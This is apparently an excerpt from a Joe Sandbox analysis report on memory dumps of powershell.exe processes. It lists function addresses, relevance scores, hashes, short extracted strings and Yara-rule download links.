Source File: 00000001.00000002.2510420831.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b99af49be26a0dbe7a912559cd5bc2bdea7743e850be44d3331fbfce44293f0
Instruction ID: 9340f34e14ef1daa70d8f429ab780abf7857e417d514e9a2ab401e9b18d1f438
Opcode Fuzzy Hash: 8b99af49be26a0dbe7a912559cd5bc2bdea7743e850be44d3331fbfce44293f0
Instruction Fuzzy Hash: 22F1D230A09A4D8FDF98DF5CC4A5AE97BF1FF58300F1541AAD419D72A6CA34E842CB81

Function 00007FFD9B956609 Relevance: .5, Instructions: 496COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2511294782.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e5b6b26b24e9246658a3e2da8966bcba2fb4cbd87bc36cc066e820bd84910c
Instruction ID: 8f8dbd70fba98af22a8c9e5cb784dc1a13b6ee05b47d2531eaf6bc20ad7692e9
Opcode Fuzzy Hash: 97e5b6b26b24e9246658a3e2da8966bcba2fb4cbd87bc36cc066e820bd84910c
Instruction Fuzzy Hash: 76F15932B5FA8E5FEBA5CBA848745B47BE1EF55320F0901BAD85CC71F3DA58A9018301

Function 00007FFD9B957625 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2511294782.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea819980383a1b606deb6f0d1700a8a6db09c6546ca38e7d8fb8a9c7c202175
Instruction ID: 906890c5fec2a84c6fb1e4b70511bdc980fff7b1038264616c56a8a6444f35f2
Opcode Fuzzy Hash: 4ea819980383a1b606deb6f0d1700a8a6db09c6546ca38e7d8fb8a9c7c202175
Instruction Fuzzy Hash: 3CD14522B1FA8E2FE7A59BAC58745B47BD1EF55210B0901BBD85CC70E3ED4CAE018342

Function 00007FFD9B884A0C Relevance: .5, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2510420831.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10ab49ab4d96d51f1847ed0f5d50ab965f5886cb6d81a277e31f1bf9b35afc1a
Instruction ID: 0f7d19cd9be77b7e327c82ed920365d7280b2dea0e9cb0031fdc0addd899963f
Opcode Fuzzy Hash: 10ab49ab4d96d51f1847ed0f5d50ab965f5886cb6d81a277e31f1bf9b35afc1a
Instruction Fuzzy Hash: 3AD1D332B09E5D4FDF58DF9CD465AE977A1FF98310F19417AD019C72A6CE34A8828780

Function 00007FFD9B8844E0 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2510420831.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49302097a9b74f2b2a8ebb5b7438a1d2d1d50b8af3ce7c380869b6889704e2d6
Instruction ID: 6eaf9a298edd2f9991159c021e0ea661400d0493a38ce293e0c66fab4538ba0e
Opcode Fuzzy Hash: 49302097a9b74f2b2a8ebb5b7438a1d2d1d50b8af3ce7c380869b6889704e2d6
Instruction Fuzzy Hash: 97A16923B0EAAA4FD719B7ACF8B55E93B90DF4227970901BBC199CB093EC1464478391

Function 00007FFD9B9567A7 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2511294782.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67254f049499cdc91fcff39f10d382e1b708287fd0143d52ddba4340d4a32638
Instruction ID: 7730edaa025b8c123e9e569b55299e9357fb6c5353825522ed16939777e8b729
Opcode Fuzzy Hash: 67254f049499cdc91fcff39f10d382e1b708287fd0143d52ddba4340d4a32638
Instruction Fuzzy Hash: 4F510322F6FA8E1FF7A5DBA844705B867D1EF55220F5900BAD95CC71F2DD18A8408302

Function 00007FFD9B957822 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2511294782.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55d57d04d7fe6c7f9cd4e2fbc671d64017de5ad52d6e405db120281bc3663228
Instruction ID: 07f150876a8a03168b1c6f49f11f259279de95cdbc5294aa3ee1a366584e6ef5
Opcode Fuzzy Hash: 55d57d04d7fe6c7f9cd4e2fbc671d64017de5ad52d6e405db120281bc3663228
Instruction Fuzzy Hash: AD311852F6FA9A1BF7B697D818B11B867C1EF10660B5900BAD95CC70E3ED4C6A008242

Function 00007FFD9B953890 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2511294782.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f6a25b40cb1911c6fa21bf024f47940bc501e4f33ae009a010f915da2490665
Instruction ID: e747d820ca8f7a4ad11f769089485f7e2fd86764f22595d15d4c4476e2eea003
Opcode Fuzzy Hash: 2f6a25b40cb1911c6fa21bf024f47940bc501e4f33ae009a010f915da2490665
Instruction Fuzzy Hash: 48312562B6FA4B5FE7BC96D828716B4A7D1EF84210B5A02BAD91FC70E3DD58AC014241

Function 00007FFD9B883535 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2510420831.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 1fa9c4b6de25af3c09eeda563ddac642f27ce745a1e9786955744c945ca2b0d9
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 2A01A77020CB0C4FD748EF0CE451AA5B3E0FB89320F10056DE58AC36A1DA32E881CB41

Non-executed Functions

Function 00007FFD9B8889FA Relevance: 6.4, Strings: 5, Instructions: 100COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B888A7A
N_^, xrefs: 00007FFD9B888A6A
N_^, xrefs: 00007FFD9B8889FA
N_^, xrefs: 00007FFD9B888AC9
N_^, xrefs: 00007FFD9B888A2A

Memory Dump Source

Source File: 00000001.00000002.2510420831.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-2528851458
Opcode ID: aa72fe4f6daf0aaf6e3ccf021b1fa891e026f07b43b348fe3a16c8f1bae6ee68
Instruction ID: 7d7d8d6db943ce880cabfd466e1d9b8cf4b3861d7f9702acaf46003eda46adef
Opcode Fuzzy Hash: aa72fe4f6daf0aaf6e3ccf021b1fa891e026f07b43b348fe3a16c8f1bae6ee68
Instruction Fuzzy Hash: C331B6A2B1FDC60BE36647598CB90956BA0FF6575474A03F6C1FA4B0E3ED281A038347

Analysis Process: powershell.exePID: 6540, Parent PID: 4412COMMON

Executed Functions

Function 0454F1F0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67fa34bddb04ebc8a5e2b9e1a5a10576dea93f564c3cf37e46bff4ec4166028
Instruction ID: c0842008d00528efdcc52414ad92ae21b1e6133910fdaae939802c597de52ef5
Opcode Fuzzy Hash: a67fa34bddb04ebc8a5e2b9e1a5a10576dea93f564c3cf37e46bff4ec4166028
Instruction Fuzzy Hash: 18B15C71E00209DFDB10CFADD9857DEBBF2BF88308F148529D815AB294EB34A845DB91

Function 0454FAC0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb63063daa272282e2aaf4990c6a4d62614126d8027a7466080bdad3a38cca96
Instruction ID: 00bd3deb63efcc528afaa87dbfd6e5be845ace97cbd8c5c193df16d7af800084
Opcode Fuzzy Hash: eb63063daa272282e2aaf4990c6a4d62614126d8027a7466080bdad3a38cca96
Instruction Fuzzy Hash: 06B18E72E00209DFDB10CFACD89179DBBF2BF88318F148529D815EB294EB34A845DB81

Function 073D3D38 Relevance: 15.5, Strings: 12, Instructions: 483COMMON

Download Yara Rule

Strings

$^q, xrefs: 073D418F
$^q, xrefs: 073D3E4A
4'^q, xrefs: 073D3EB0
$^q, xrefs: 073D41F4
$^q, xrefs: 073D3E56
4'^q, xrefs: 073D4252
$^q, xrefs: 073D3E0E
4'^q, xrefs: 073D4246
$^q, xrefs: 073D41E8
4'^q, xrefs: 073D405B
4'^q, xrefs: 073D3EBC
4'^q, xrefs: 073D404F

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-879563280
Opcode ID: 8844c33919ca5e7c2fbd3121c99d21d61c22bd449567eada7af01336459da9d3
Instruction ID: c0ce77c7c0990ef7e9aefdf8610eb1940813ef45084c299cae82b6f48647eb12
Opcode Fuzzy Hash: 8844c33919ca5e7c2fbd3121c99d21d61c22bd449567eada7af01336459da9d3
Instruction Fuzzy Hash: 37F15DB3B0424ADFEB158F39E854666BBF5AF85310F1484AAD809CF295DB31CC45C7A2

Function 073D6060 Relevance: 9.6, Strings: 7, Instructions: 833COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D6344
4'^q, xrefs: 073D6350
(f&l, xrefs: 073D6B66
(f&l, xrefs: 073D625C
(f&l, xrefs: 073D6826
(f&l, xrefs: 073D681C
(f&l, xrefs: 073D6B70

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l$(f&l$(f&l$(f&l$4'^q$4'^q
API String ID: 0-2517809532
Opcode ID: 2accd4be0e8a12f07bd7053b60322ebb8f3ecff5240bd7ad1f2d85e32d5e89e1
Instruction ID: a24419e8f46936b255ccbdb9d8487b1d64c7921b8d6372189bd80b8aa176e8d9
Opcode Fuzzy Hash: 2accd4be0e8a12f07bd7053b60322ebb8f3ecff5240bd7ad1f2d85e32d5e89e1
Instruction Fuzzy Hash: CD727CB5B00218DFD714CB58C955A9EBBF2BB89304F10C069D919AF795CB72EC82CB91

Function 073D1D28 Relevance: 9.2, Strings: 7, Instructions: 483COMMON

Download Yara Rule

Strings

$^q, xrefs: 073D1E8E
4'^q, xrefs: 073D1EF1
4'^q, xrefs: 073D1EFD
$^q, xrefs: 073D1D69
$^q, xrefs: 073D1D3A
$^q, xrefs: 073D1D5B
$^q, xrefs: 073D2244

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-75002515
Opcode ID: 203f3f68150613ce3b2f2a1823b82de2bb27dec54a012ea6449f900a448636f4
Instruction ID: 8b1bee971bedd8a70005d4d5437dc804b82c5e2ae991aa0440ba6c7f884e453c
Opcode Fuzzy Hash: 203f3f68150613ce3b2f2a1823b82de2bb27dec54a012ea6449f900a448636f4
Instruction Fuzzy Hash: 8EF179B3B0424A8FE7158B79E81066BFBE6BFC6310F15846AD849CB651DB31CC45C7A1

Function 073D88D0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D89FA
4'^q, xrefs: 073D8B5F
4'^q, xrefs: 073D8BEA
4'^q, xrefs: 073D8BDE
4'^q, xrefs: 073D8B6B
4'^q, xrefs: 073D8A06

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: 54d0998f0f5c5ad10edfae48a20e45f49b0d758c7967e53dcb3e747711777d28
Instruction ID: f16dc9f092e51e4d00c18e8e664a630fdf87bbe9b207aa568fe213aa6e122200
Opcode Fuzzy Hash: 54d0998f0f5c5ad10edfae48a20e45f49b0d758c7967e53dcb3e747711777d28
Instruction Fuzzy Hash: 3BD190B1A402089FDB14DB68D551B9EBBA2EF88304F10C429D9057F799CB75FC86CBA1

Function 073D763D Relevance: 7.8, Strings: 6, Instructions: 312COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D790A
4'^q, xrefs: 073D7995
4'^q, xrefs: 073D77B9
4'^q, xrefs: 073D7916
4'^q, xrefs: 073D77C5
4'^q, xrefs: 073D7989

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: 5f26ae70556879f252fad73534abc15f76e3e51e9c3499ca8756c92987243e7c
Instruction ID: cc869936d315cf9fc20b7d6927a4fdb10dbca12c5d7be8ed44d4a86d7f9ed22b
Opcode Fuzzy Hash: 5f26ae70556879f252fad73534abc15f76e3e51e9c3499ca8756c92987243e7c
Instruction Fuzzy Hash: 2FD182B0A002189FD714DB68C955F9EBBB2FB85304F1084A9D9097F795CB31ED868BA1

Function 073D7AC3 Relevance: 5.4, Strings: 4, Instructions: 395COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D7D34
(f&l, xrefs: 073D7E0E
(f&l, xrefs: 073D7E02
4'^q, xrefs: 073D7D28

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l$4'^q$4'^q
API String ID: 0-4098022771
Opcode ID: 6296fb3950c40d422d8f2e783ce6ca086b2ee19099cb17261319993a87f19a38
Instruction ID: 68c36244104456e7b2ea59ec1f613b162557e178dd1cfc63da580642b7b7446b
Opcode Fuzzy Hash: 6296fb3950c40d422d8f2e783ce6ca086b2ee19099cb17261319993a87f19a38
Instruction Fuzzy Hash: 2BF1B2B0A002189FD724DB68CD55FAEBBB2EF85300F1084A5D9097F795CB75ED828B91

Function 073D6040 Relevance: 4.4, Strings: 3, Instructions: 644COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D6344
(f&l, xrefs: 073D625C
(f&l, xrefs: 073D681C

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l$4'^q
API String ID: 0-3810660032
Opcode ID: d16a79e43a480ca15d0591ac51be125b751b76f2379660e38b6f4e41fdec73a7
Instruction ID: f1040e76a503b26df4a2f65e6bf0a5e88becd9e2340d84a928713c711e3df3f4
Opcode Fuzzy Hash: d16a79e43a480ca15d0591ac51be125b751b76f2379660e38b6f4e41fdec73a7
Instruction Fuzzy Hash: 94425AB5A00218DFDB14CB58C951A9DBBB2FB89344F14C099D919AF796CB72EC42CB80

Function 0454BB00 Relevance: 4.3, Strings: 3, Instructions: 517COMMON

Download Yara Rule

Strings

$^q, xrefs: 0454C07F
$^q, xrefs: 0454BD1A
Hbq, xrefs: 0454BBC6

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID: Hbq$$^q$$^q
API String ID: 0-1611274095
Opcode ID: 9fe7cd82dc98c8955f6baba2cc15623069c3f560c96ad84fe004524da4bdddee
Instruction ID: ad9cc0b435ea385a9d11acc5a9c6e7856090bb8746e16021f8d84659b61e062d
Opcode Fuzzy Hash: 9fe7cd82dc98c8955f6baba2cc15623069c3f560c96ad84fe004524da4bdddee
Instruction Fuzzy Hash: BA225130B012188FCB25DB24D9547AEB7B2BFC9304F1584A9D40AAB351DF35AE81DF95

Function 073D88B0 Relevance: 4.0, Strings: 3, Instructions: 268COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D89FA
4'^q, xrefs: 073D8B5F
4'^q, xrefs: 073D8BDE

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 96a2485013f071cce7b3ac191d3c7f93f33eb28988ec21de06f4a4d3241b0e27
Instruction ID: 8165927be19dd2e633b74f98957c4e1129f51b49608d635df246c5da0bd103b7
Opcode Fuzzy Hash: 96a2485013f071cce7b3ac191d3c7f93f33eb28988ec21de06f4a4d3241b0e27
Instruction Fuzzy Hash: 69B17CB1A00209DFDB14CB68D951B9EBBB2EB88304F148469D8097F795CB75FC86CB91

Function 073D6949 Relevance: 3.0, Strings: 2, Instructions: 459COMMON

Download Yara Rule

Strings

(f&l, xrefs: 073D6B66
(f&l, xrefs: 073D681C

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l
API String ID: 0-2159561086
Opcode ID: 51ac784994faf23c3a9774f67a7304a2b4c45a1a449c344f04d72cada58cd17e
Instruction ID: b53223628a530946c90f203dff6fa79607e1b7d24af866d293c0bacce8328c19
Opcode Fuzzy Hash: 51ac784994faf23c3a9774f67a7304a2b4c45a1a449c344f04d72cada58cd17e
Instruction Fuzzy Hash: CC124CB5A00219DFE714CB58C552EADBBB2FB89344F14C099D919AF795CB32EC42CB90

Function 073D6D08 Relevance: 2.7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

(f&l, xrefs: 073D6E45
(f&l, xrefs: 073D6E4F

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l$(f&l
API String ID: 0-2159561086
Opcode ID: 92dd9dde6c8ce9f11449ba4ea4e5e424b4df7a120c71dd398be37d79eae12733
Instruction ID: 51a01011cddd17998673f0a4b3b721a7328a32a3e41f1b421e61f7e4b9545736
Opcode Fuzzy Hash: 92dd9dde6c8ce9f11449ba4ea4e5e424b4df7a120c71dd398be37d79eae12733
Instruction Fuzzy Hash: 019196B1B00218DFD714DB68D551B9EBBE3AB88340F108065E9057F795CB72EC858BA1

Function 073D43D4 Relevance: 2.7, Strings: 2, Instructions: 198COMMON

Download Yara Rule

Strings

84$l, xrefs: 073D4593
tP^q, xrefs: 073D45EE

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 84$l$tP^q
API String ID: 0-2302236802
Opcode ID: f0ef87aafb0d5b7559510220aee97b12cf72286b99c19df4b44a3a83cd10c189
Instruction ID: 617db3e6e2e75f850544a88fade4e9c26ac10a61304a9cc5d597c124ffb04933
Opcode Fuzzy Hash: f0ef87aafb0d5b7559510220aee97b12cf72286b99c19df4b44a3a83cd10c189
Instruction Fuzzy Hash: 3771E5B1A093959FD712CB64D864615BBB1AF82311F1DC4EAE8488F293C735DC86C791

Function 073D92EB Relevance: 2.7, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D9485
4'^q, xrefs: 073D9479

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 5d6503d94232b70cf7dd710b87a7dd1730bea71c03bb282b56c9bfc5b00789d6
Instruction ID: 8349aa720adee7f12efdd7a4c9e66a1ec2294091fcceb8a9b3a186624feabf7b
Opcode Fuzzy Hash: 5d6503d94232b70cf7dd710b87a7dd1730bea71c03bb282b56c9bfc5b00789d6
Instruction Fuzzy Hash: 135139F2B002168FEB14CB78A55876AB7E6EB82200F1484A5D549CF7D7DB32EC85C761

Function 073D98DE Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073D99AC
4'^q, xrefs: 073D99A0

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 8aa4a2924c327148282753a198dad660e54a6c4af68c316ba93d1c58700e7d31
Instruction ID: 53e6b556d43e4760cddda7cb3210e68afc41254cbd61840ae6a755140f4d7d3f
Opcode Fuzzy Hash: 8aa4a2924c327148282753a198dad660e54a6c4af68c316ba93d1c58700e7d31
Instruction Fuzzy Hash: 9B31AFF3B442059FDB149A38A46076ABB9BDFC2224F10447ACA499F795DF32EC45C3A1

Function 073D6CE1 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

(f&l, xrefs: 073D6E45

Memory Dump Source

Source File: 00000004.00000002.2305738789.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73d0000_powershell.jbxd

Similarity

API ID:
String ID: (f&l
API String ID: 0-2403483912
Opcode ID: fc1e2a31a7ab7946ad6d8430f353b63ab4ecfe7164b15d2aa38d4290714e0d0d
Instruction ID: 04ffb3faee5e77067c508238a9f97322ac1b1f0afb914aaf5448b27c3518849a
Opcode Fuzzy Hash: fc1e2a31a7ab7946ad6d8430f353b63ab4ecfe7164b15d2aa38d4290714e0d0d
Instruction Fuzzy Hash: 7D9190B5A01208EFD714CB68D951F9EBBA2BB88344F108069E9157F791CB36EC81CB91

Function 04549580 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08b1238140d6295198f3c70327649add6cc20517aa3676f317e1d27c591aabd
Instruction ID: ffcd9c6301b04f93a943184bac4daa4979892cc9fe616b646fb7bcf98a38c7cd
Opcode Fuzzy Hash: c08b1238140d6295198f3c70327649add6cc20517aa3676f317e1d27c591aabd
Instruction Fuzzy Hash: 7DC19B71A002089FDB14DFB9D945A9EBBB2FFC4318F118558E406AF365CB34AD89DB80

Function 0454F1EE Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15994cd1a1f41133f1fa0892c984ec7d52aebc631af89e59cfd8306bf959925
Instruction ID: 4f9c4b1915a995ad3466448b4487b65c2f01f79b5a76afcadc7f4de546da8447
Opcode Fuzzy Hash: a15994cd1a1f41133f1fa0892c984ec7d52aebc631af89e59cfd8306bf959925
Instruction Fuzzy Hash: 31B15C71E00209DFDB10CFADD9857DEBBF1BF88318F148529E819AB254EB34A845DB91

Function 0454FAB4 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3eccd37da7d4f52b530bd3e15568a2d3a10863ec560d3612ecaa4dc76a55d58
Instruction ID: 912055c832d2446f480ba71e192be0f9a7d948d57b71ca296557d70479615c2a
Opcode Fuzzy Hash: f3eccd37da7d4f52b530bd3e15568a2d3a10863ec560d3612ecaa4dc76a55d58
Instruction Fuzzy Hash: 2BB16C72E00209DFDB10CFA8D8957DDBBF1BF88318F148529E815EB294EB34A845DB81

Function 04548DE8 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408769f223220b8906673512960f89edc5b89374e42a59e3e2c1f8417aef391f
Instruction ID: cc030e2efe666f9ad1e22acf5162cd7e8289f2769d730fbff78e5d36d52c3631
Opcode Fuzzy Hash: 408769f223220b8906673512960f89edc5b89374e42a59e3e2c1f8417aef391f
Instruction Fuzzy Hash: 5F718C34A11244DFCB15DFA8D8849AEBBF2FF89304F1884A9E405AF362D735E985DB50

Function 04549D48 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0674cc42c4d1bcbb95a4277b5604bf38775388a5dfe75185294d3cdebd6eeded
Instruction ID: 3acf0b5f2d80efe251be2031a4953c4079e1589269ef4b233d2c113267518d8a
Opcode Fuzzy Hash: 0674cc42c4d1bcbb95a4277b5604bf38775388a5dfe75185294d3cdebd6eeded
Instruction Fuzzy Hash: DE719D30A00219DFCB14DF79D884A9EBBF6FF84318F148969E415DB261EB75AC46CB90

Function 04549EB6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2299492671.0000000004540000.00000040.00000800.00020000.00000000.sdmp, Offset: 04540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68666584c83b1946e6187997e5b2a0fc69b1f380d09c0545584a0c5e6b3e1618
